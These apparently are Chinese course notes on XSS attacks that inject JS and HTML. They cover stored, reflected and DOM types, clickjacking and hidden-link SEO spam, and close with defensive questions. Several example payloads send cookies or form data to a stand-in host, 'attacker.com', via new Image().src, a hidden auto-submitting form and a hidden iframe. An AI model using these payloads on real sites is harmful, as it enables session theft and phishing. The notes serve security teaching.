课程笔记:植入 JS、HTML 代码攻击
课程名称:计算机网络应用 核心摘要:本节课在回顾 XSS 三种攻击类型(存储型、反射型、DOM 型)的基础上,重点剖析植入恶意 JS 脚本与植入 HTML 代码两种攻击手段的实现原理、攻击向量及潜在危害,涵盖 Cookie 窃取、表单钓鱼、流量劫持、隐藏友链刷权重、iframe 点击劫持等典型场景。
一、 核心概念与原理
- 跨站脚本攻击(XSS) 的三种常见类型:
| 类型 | 特性 | 危害程度 |
|---|---|---|
| 存储型 | 持久化攻击,恶意脚本存入服务器(如数据库) | 最深 |
| 反射型 | 非持久化,通过 URL 参数触发,需诱导点击 | 中 |
| DOM 型 | 反射型的特殊类型,纯前端 DOM 操作触发,不经过服务端 | 中 |
- 攻击载体分两类:植入 HTML 代码 与 植入恶意 JS 脚本,二者常配合使用(JS 脚本中可输出 HTML)。
- JS 脚本攻击 因脚本是动态执行的,可按需编写函数,能完成的工作多、破坏力大。
二、 技术细节与协议分析
2.1 植入 JS 代码攻击
攻击方式:
| 方式 | 说明 | 危害强度 |
|---|---|---|
| 引入外部 JS 文件 | 一个 JS 文件可包含大量恶意脚本,完成更多攻击动作 | 更狠 |
| 内联 JS 代码 | 受文本框长度限制,可写入的代码量有限 | 较弱 |
一般 Web 应用会对文本框做长度限制,因此外部引入 JS 文件是更高效的攻击路径。
实现原理与典型攻击向量:
| 攻击向量 | 实现方式 |
|---|---|
new Image().src | 通过 Image 对象的 src 属性发送数据(携带 Cookie 等) |
| 构造表单 + 引入外部 JS | JS 文件中输出 HTML 构造登录页面,诱导用户录入账户信息 |
| 隐藏表单自动提交 | 将 form 表单属性设为 hidden,自动提交用户数据 |
| 页面强制跳转 | 恶意流量劫持,将用户重定向到攻击者站点 |
| 植入文字/图片链接 | 植入外链或广告链接 |
2.2 植入 HTML 代码攻击(DOM 型典型场景)
| 标签/Payload | 触发机制 | 说明 |
|---|---|---|
<img src=x onerror=...> | onerror 事件 | src 加载失败时触发 onerror 执行脚本,也可通过 src 发送数据 |
<a href=...> | href + 诱导单击 | 必须诱导用户点击,不点击则无效 |
<iframe src=...> | 加载外部 URL | 引入第三方页面,可隐藏,可遮挡正常网页实施点击劫持 |
| 其他 HTML 标签 | 事件处理 | 通过 onerror、onload 等事件触发脚本 |
iframe 点击劫持原理:
- 在正常网页上植入一个隐藏的 iframe;
- iframe 遮挡在目标网页上层;
- 用户以为操作的是下层目标网页,实际点击的是上层 iframe;
- 从而在用户无感知下完成敏感操作。
三、 实践应用与配置命令
3.1 利用 Image 对象外带数据
// 通过 new Image() 构造请求,将 Cookie 等数据发送到攻击者服务器
var img = new Image();
img.src = "http://attacker.com/collect?cookie=" + document.cookie;
3.2 隐藏表单自动提交
<!-- 将表单设为隐藏,自动提交用户敏感数据 -->
<form action="http://attacker.com/steal" method="POST" style="display:none;">
<input type="hidden" name="token" value="autofilled">
</form>
<script>document.forms[0].submit();</script>
3.3 img onerror 触发脚本
<!-- src 加载失败触发 onerror,执行恶意 JS -->
<img src="x" onerror="alert(document.cookie)">
3.4 iframe 隐藏加载第三方页面
<!-- 隐藏 iframe,实现点击劫持或静默加载恶意页面 -->
<iframe src="http://attacker.com/page" style="display:none;"></iframe>
四、 重点与难点提示
潜在危害清单(JS / HTML 通用)
- 窃取 Cookie / JSESSIONID:拿到
JSESSIONID后在浏览器调试模式直接写入该值即可免登录冒充身份。 - 表单钓鱼:构造伪造表单诱导用户输入账号、密码等敏感信息。
- 流量劫持:强制跳转到其他网站,窃取目标站点流量。
- 植入广告 / 外链:植入广告或外链牟利。
- 隐藏友链刷权重:通过植入隐藏友情链接提升攻击者站点的搜索引擎权重。
友链刷权重原理(重点理解)
- 搜索引擎(百度/谷歌) 通过爬虫程序爬取互联网网页信息;
- 只有被收录的网页才能在搜索结果中展示 → 这是电商/互联网公司要求页面静态化的原因;
- 搜索结果排名与网站权重相关,权重越高排名越靠前;
- 影响权重的因素:文章质量、友情链接(友链) 等;
- 攻击链路:黑客(站点 B)入侵大量网站(站点 A),在其中植入隐藏友链指向 B,从而提升 B 的权重与排名。
易错点 / 考点
- DOM 型 XSS 与反射型 XSS 的区别:是否经过服务端。
onerror与onload的触发条件相反:前者加载失败触发,后者加载成功触发。- iframe 的两大危险特性:加载外部 URL 与 可隐藏。
- JS 攻击与 HTML 攻击的危害大量重叠,实际中常混合使用(JS 中输出 HTML)。
- 存储型 XSS 危害最深的根因:恶意脚本持久化存储在服务器,对所有访问者生效。
五、 课后疑问/遗留问题
- 针对外部引入 JS 文件这类攻击,Web 应用应如何从输入校验、CSP(内容安全策略)层面进行防御?
- iframe 点击劫持的防御手段有哪些?(提示:
X-Frame-Options响应头、frame-ancestors指令) - Cookie 窃取后如何防止
JSESSIONID被冒充?(提示:HttpOnly、SameSite属性) - 隐藏友链刷权重的检测与清除方案有哪些?
- 下一节课预告:XSS 防御与过滤机制。